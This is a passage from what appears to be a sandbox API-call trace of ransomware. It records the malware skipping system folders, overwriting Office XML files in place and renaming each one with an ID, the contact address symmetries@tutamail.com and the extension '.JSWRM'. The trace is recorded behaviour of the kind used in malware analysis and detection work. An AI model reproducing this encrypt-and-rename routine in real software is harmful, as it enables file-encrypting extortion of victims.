lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40948) returned 1 [0139.270] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.270] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9ff0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x9ff0, lpOverlapped=0x0) returned 1 [0139.274] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.274] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9ff0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x9ff0, lpOverlapped=0x0) returned 1 [0139.274] CloseHandle (hObject=0x238) returned 1 [0139.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN075.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn075.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN075.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn075.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.275] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d7457f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d7457f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d76b9e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdbdc0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN081.XML", cAlternateFileName="")) returned 1 [0139.275] lstrcmpiW (lpString1="PGMN081.XML", lpString2=".") returned 1 [0139.275] lstrcmpiW (lpString1="PGMN081.XML", lpString2="..") returned 1 [0139.275] lstrcmpiW (lpString1="PGMN081.XML", lpString2="...") returned 1 [0139.275] lstrcmpiW (lpString1="PGMN081.XML", lpString2="windows") returned -1 [0139.275] lstrcmpiW (lpString1="PGMN081.XML", lpString2="recovery") returned -1 [0139.275] lstrcmpiW (lpString1="PGMN081.XML", lpString2="perflogs") returned 1 [0139.275] lstrcmpiW (lpString1="PGMN081.XML", lpString2="documents and settings") returned 1 [0139.275] lstrcmpiW (lpString1="PGMN081.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.276] lstrcmpiW (lpString1="PGMN081.XML", lpString2="system volume information") returned -1 [0139.276] lstrcmpiW (lpString1="PGMN081.XML", lpString2="msocache") returned 1 [0139.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN081.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN081.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN081.XML", lpUsedDefaultChar=0x0) returned 11 [0139.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN081.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN081.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN081.XML", lpUsedDefaultChar=0x0) returned 11 [0139.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN081.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn081.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.277] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=900544) returned 1 [0139.277] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.277] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.290] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.290] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.291] CloseHandle (hObject=0x238) returned 1 [0139.294] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN081.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn081.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN081.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn081.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.295] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d7457f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d7457f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7457f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31a78, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN082.XML", cAlternateFileName="")) returned 1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2=".") returned 1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="..") returned 1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="...") returned 1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="windows") returned -1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="recovery") returned -1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="perflogs") returned 1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="documents and settings") returned 1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="system volume information") returned -1 [0139.295] lstrcmpiW (lpString1="PGMN082.XML", lpString2="msocache") returned 1 [0139.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN082.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN082.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN082.XML", lpUsedDefaultChar=0x0) returned 11 [0139.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN082.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN082.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN082.XML", lpUsedDefaultChar=0x0) returned 11 [0139.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN082.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn082.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.297] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=203384) returned 1 [0139.297] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.297] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.308] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.308] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.309] CloseHandle (hObject=0x238) returned 1 [0139.309] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN082.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn082.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN082.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn082.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.310] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d7457f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d7457f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d76b9e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d14, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN086.XML", cAlternateFileName="")) returned 1 [0139.310] lstrcmpiW (lpString1="PGMN086.XML", lpString2=".") returned 1 [0139.310] lstrcmpiW (lpString1="PGMN086.XML", lpString2="..") returned 1 [0139.311] lstrcmpiW (lpString1="PGMN086.XML", lpString2="...") returned 1 [0139.311] lstrcmpiW (lpString1="PGMN086.XML", lpString2="windows") returned -1 [0139.311] lstrcmpiW (lpString1="PGMN086.XML", lpString2="recovery") returned -1 [0139.311] lstrcmpiW (lpString1="PGMN086.XML", lpString2="perflogs") returned 1 [0139.311] lstrcmpiW (lpString1="PGMN086.XML", lpString2="documents and settings") returned 1 [0139.311] lstrcmpiW (lpString1="PGMN086.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.311] lstrcmpiW (lpString1="PGMN086.XML", lpString2="system volume information") returned -1 [0139.311] lstrcmpiW (lpString1="PGMN086.XML", lpString2="msocache") returned 1 [0139.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN086.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN086.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN086.XML", lpUsedDefaultChar=0x0) returned 11 [0139.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN086.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN086.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN086.XML", lpUsedDefaultChar=0x0) returned 11 [0139.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN086.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn086.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.312] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11540) returned 1 [0139.312] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.312] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2d10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2d10, lpOverlapped=0x0) returned 1 [0139.316] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.316] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2d10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2d10, lpOverlapped=0x0) returned 1 [0139.316] CloseHandle (hObject=0x238) returned 1 [0139.316] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN086.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn086.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN086.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn086.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.317] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f001f8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1f001f8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1f001f8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN089.XML", cAlternateFileName="")) returned 1 [0139.317] lstrcmpiW (lpString1="PGMN089.XML", lpString2=".") returned 1 [0139.317] lstrcmpiW (lpString1="PGMN089.XML", lpString2="..") returned 1 [0139.317] lstrcmpiW (lpString1="PGMN089.XML", lpString2="...") returned 1 [0139.317] lstrcmpiW (lpString1="PGMN089.XML", lpString2="windows") returned -1 [0139.317] lstrcmpiW (lpString1="PGMN089.XML", lpString2="recovery") returned -1 [0139.317] lstrcmpiW (lpString1="PGMN089.XML", lpString2="perflogs") returned 1 [0139.317] lstrcmpiW (lpString1="PGMN089.XML", lpString2="documents and settings") returned 1 [0139.318] lstrcmpiW (lpString1="PGMN089.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.318] lstrcmpiW (lpString1="PGMN089.XML", lpString2="system volume information") returned -1 [0139.318] lstrcmpiW (lpString1="PGMN089.XML", lpString2="msocache") returned 1 [0139.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN089.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN089.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN089.XML", lpUsedDefaultChar=0x0) returned 11 [0139.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN089.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN089.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN089.XML", lpUsedDefaultChar=0x0) returned 11 [0139.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN089.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn089.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.319] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4518) returned 1 [0139.319] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.319] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x11a0, lpOverlapped=0x0) returned 1 [0139.320] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.321] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x11a0, lpOverlapped=0x0) returned 1 [0139.321] CloseHandle (hObject=0x238) returned 1 [0139.321] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN089.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn089.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN089.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn089.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.322] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d7457f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d7457f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7457f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN090.XML", cAlternateFileName="")) returned 1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2=".") returned 1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="..") returned 1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="...") returned 1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="windows") returned -1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="recovery") returned -1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="perflogs") returned 1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="documents and settings") returned 1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="system volume information") returned -1 [0139.322] lstrcmpiW (lpString1="PGMN090.XML", lpString2="msocache") returned 1 [0139.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN090.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN090.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN090.XML", lpUsedDefaultChar=0x0) returned 11 [0139.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN090.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN090.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN090.XML", lpUsedDefaultChar=0x0) returned 11 [0139.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN090.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn090.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.323] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=578) returned 1 [0139.323] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.323] ReadFile (in: hFile=0x238, lpBuffer=0x207860, nNumberOfBytesToRead=0x240, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesRead=0x345e89c*=0x240, lpOverlapped=0x0) returned 1 [0139.324] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.324] WriteFile (in: hFile=0x238, lpBuffer=0x207860*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesWritten=0x345e898*=0x240, lpOverlapped=0x0) returned 1 [0139.324] CloseHandle (hObject=0x238) returned 1 [0139.324] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN090.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn090.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN090.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn090.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.327] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d7457f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d7457f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7457f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb76, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN092.XML", cAlternateFileName="")) returned 1 [0139.327] lstrcmpiW (lpString1="PGMN092.XML", lpString2=".") returned 1 [0139.327] lstrcmpiW 